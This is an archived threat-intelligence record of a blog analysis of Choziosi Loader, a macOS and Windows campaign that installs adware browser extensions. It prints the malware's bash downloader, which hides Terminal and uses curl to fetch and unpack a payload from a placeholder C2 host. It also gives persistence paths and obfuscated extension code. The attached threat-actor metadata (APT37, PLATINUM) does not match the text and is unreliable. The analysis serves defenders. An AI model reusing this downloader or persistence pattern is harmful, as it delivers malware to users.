{
	"id": "e88fe4b6-e524-42bc-8dd3-b35da5132dfe",
	"created_at": "2026-04-06T01:29:36.557805Z",
	"updated_at": "2026-04-10T03:38:06.556474Z",
	"deleted_at": null,
	"sha1_hash": "a35a086acc21c16b20007e4190ff5a2e5121a2c8",
	"title": "Choziosi Loader Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 710635,
	"plain_text": "Choziosi Loader Analysis\r\nPublished: 2022-04-25 · Archived: 2026-04-06 01:10:46 UTC\r\nHome Choziosi Loader Analysis\r\nDefault\r\nCancel\r\nChoziosi Loader: Multi-platform campaign delivering browser extension malware\r\nIn Janurary 2022 a new malware campaign delivering chrome extensions was identified by @x3ph1. Orginally\r\nthis malware was named ChromeLoader and CS_Installer due to observed scheduled task names and filename. In\r\nFeburary 2022 after some additonal activity GDATA named this malware family Choziosi Loader.\r\nRecently I revisted this threat actor and identified that Choziosi Loader is still activly targeting Mac OS users and\r\nWindows users. Furthermore Choziosi Loader delivers both malicious Chrome extensions and Safari\r\nextensions.\r\nCampaign Overview\r\nMac OS Choziosi Loader Variant\r\nIn March of 2022 variants of Choziosi Loader targeting Mac OS users were uploaded to VirusTotal. Two recent\r\nexamples of Choziosi Loader targetting Mac OS users are:\r\nYour File Is Ready To Download.dmg\r\n121300cd7050da8a1debf684f03ba05a\r\nhttps://www.th3protocol.com/2022/Choziosi-Loader\r\nPage 1 of 19\n\nStar Wars Battlefront 2 [Xbox Classic].dmg\r\na5625269e2d817258ad60044f853040e95d58b47\r\nTheses downloads prompt the user to run malware titled “Application Installer”.\r\nPersistence \u0026 Payload Delivery\r\nRecent Choziosi Loader samples have been observed delivering Safari extensions as well as Chrome extensions.\r\nTwo recent example installer scripts are:\r\n/Volumes/Application Installer/SafariInstaller.command\r\n98e0e2863f411c6d2b7a5acabc9f234f\r\n/Volumes/Application Installer/ChromeInstaller.command\r\n08dc5ad1b6cc00e129526b9054a06e4e\r\nIn this code snippet the threat actor command and control is funbeachdude[.]com. 
For the sake of this blog I’ve\r\nreplaced that value with example_c2_server.com within the example.\r\nExample: Downloader component\r\n#!/bin/bash\r\nosascript -e 'tell application \"Terminal\" to set visible of front window to false'\r\nBPATH=\"/private/var/tmp\"\r\nIPATH=$(uuidgen)\r\nEXISTS=`launchctl list | grep \"chrome.extension\"`\r\nSUB=chrome.extension\r\nif [[ \"$EXISTS\" == *\"$SUB\"* ]]; then\r\n exit 0\r\nfi\r\nstatus_code=$(curl --write-out %{http_code} --head --silent --output /dev/null https://example_c2_server.com/\r\nif [[ \"$status_code\" = 200 ]] ; then\r\n curl -s https://example_c2_server.com/archive.zip \u003e $BPATH/$IPATH.zip /dev/null\r\nelse\r\n exit 0\r\nfi\r\nsleep 1\r\nXPATH=$(uuidgen)\r\nunzip -o $BPATH/$IPATH.zip -d $BPATH/$XPATH \u0026\u003e /dev/null\r\ncd $BPATH/$XPATH\r\nThe second half of the downloader script establishes persistence by appending plist data to the following\r\nlocations:\r\nSafari Extensions:\r\n/Library/LaunchAgents/com.extension.pop.plist\r\nChrome Extensions:\r\n/Library/LaunchAgents/com.chrome.extensionsPop.plist\r\nPayload Analysis: Browser Extensions\r\nThe final objective of this malware family is to install a browser extension that performs adware injection. By\r\nhunting on VirusTotal for files dropped by the .dmg installers I was able to find 16 recent ChoziosiLoader\r\nextensions.\r\nThe main component of the extension is an obfuscated file named background.js. This file is minified and encodes\r\nsome strings with Unicode. 
I leveraged the following CyberChef recipe to quickly analyze the JavaScript functions\r\npresent in background.js:\r\n[\r\n { \"op\": \"JavaScript Beautify\",\r\n \"args\": [\"\\\\t\", \"Auto\", true, true] },\r\n { \"op\": \"Unescape Unicode Characters\",\r\n \"args\": [\"\\\\u\"] },\r\n { \"op\": \"Regular expression\",\r\n \"args\": [\"User defined\", \"function.*\", true, true, false, false, false, false, \"List matches\"] },\r\n { \"op\": \"Sort\",\r\n \"args\": [\"Line feed\", false, \"Alphabetical (case sensitive)\"] },\r\n { \"op\": \"Unique\",\r\n \"args\": [\"Line feed\", false] }\r\n]\r\nJavaScript functions of interest:\r\nfunction analytics(g, A) {\r\nfunction getAd() {\r\nfunction getWithExpiry(s) {\r\nfunction handleExtensionResp(B) {\r\nfunction handleInstalledExtensions(K) {\r\nfunction openAd() {\r\nLooking at the JavaScript closer while cross referencing the analysis by GDATA, we can conclude that this recent\r\nversion of Choziosi is performing recurring web requests for advertising and analytics updates.\r\nchrome[I7.n0(+'96')][I7.f0('42' - 0)](I7.n0('97' \u003e\u003e 32), {\r\n delayInMinutes: +'1.1',\r\n periodInMinutes: +'180'\r\n});\r\nchrome[I7.f0('96' | 0)][I7.n0('42' * 1)](I7.f0(+'44'), {\r\n delayInMinutes: +'5',\r\n periodInMinutes: +'30'\r\n});\r\nThe command and control domain used by the browser extension is at the bottom of the JavaScript file.\r\nIn this example the C2 domain is eandworldw[.]com. 
By doing some quick searching I found a reddit post from\r\nthe past 7 days where a user explains that they are experiencing search hijacking and ad injection.\r\nIOCs\r\nInstaller Packages\r\nPersistence Scripts\r\nBrowser Extension Payloads\r\nChoziosiLoader C2 Domains:\r\nRecent Malvertizing ChoziosiLoader Distribution URLs:\r\nFile Names Observed in Malvertizing URLs:\r\nSource: https://www.th3protocol.com/2022/Choziosi-Loader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.th3protocol.com/2022/Choziosi-Loader"
	],
	"report_names": [
		"Choziosi-Loader"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4",
			"created_at": "2023-01-06T13:46:38.595679Z",
			"updated_at": "2026-04-10T02:00:03.033762Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"TwoForOne",
				"G0068",
				"ATK33"
			],
			"source_name": "MISPGALAXY:PLATINUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a",
			"created_at": "2022-10-25T16:07:24.061767Z",
			"updated_at": "2026-04-10T02:00:04.854503Z",
			"deleted_at": null,
			"main_name": "Platinum",
			"aliases": [
				"ATK 33",
				"G0068",
				"Operation EasternRoppels",
				"TwoForOne"
			],
			"source_name": "ETDA:Platinum",
			"tools": [
				"AMTsol",
				"Adupib",
				"Adupihan",
				"Dipsind",
				"DvDupdate.dll",
				"JPIN",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"RedPepper",
				"RedSalt",
				"Titanium",
				"adbupd",
				"psinstrc.ps1"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33f527a5-a5da-496a-a48c-7807cc858c3e",
			"created_at": "2022-10-25T15:50:23.803657Z",
			"updated_at": "2026-04-10T02:00:05.333523Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"PLATINUM"
			],
			"source_name": "MITRE:PLATINUM",
			"tools": [
				"JPIN",
				"Dipsind",
				"adbupd"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438976,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.pdf",
		"text": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.txt",
		"img": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.jpg"
	}
}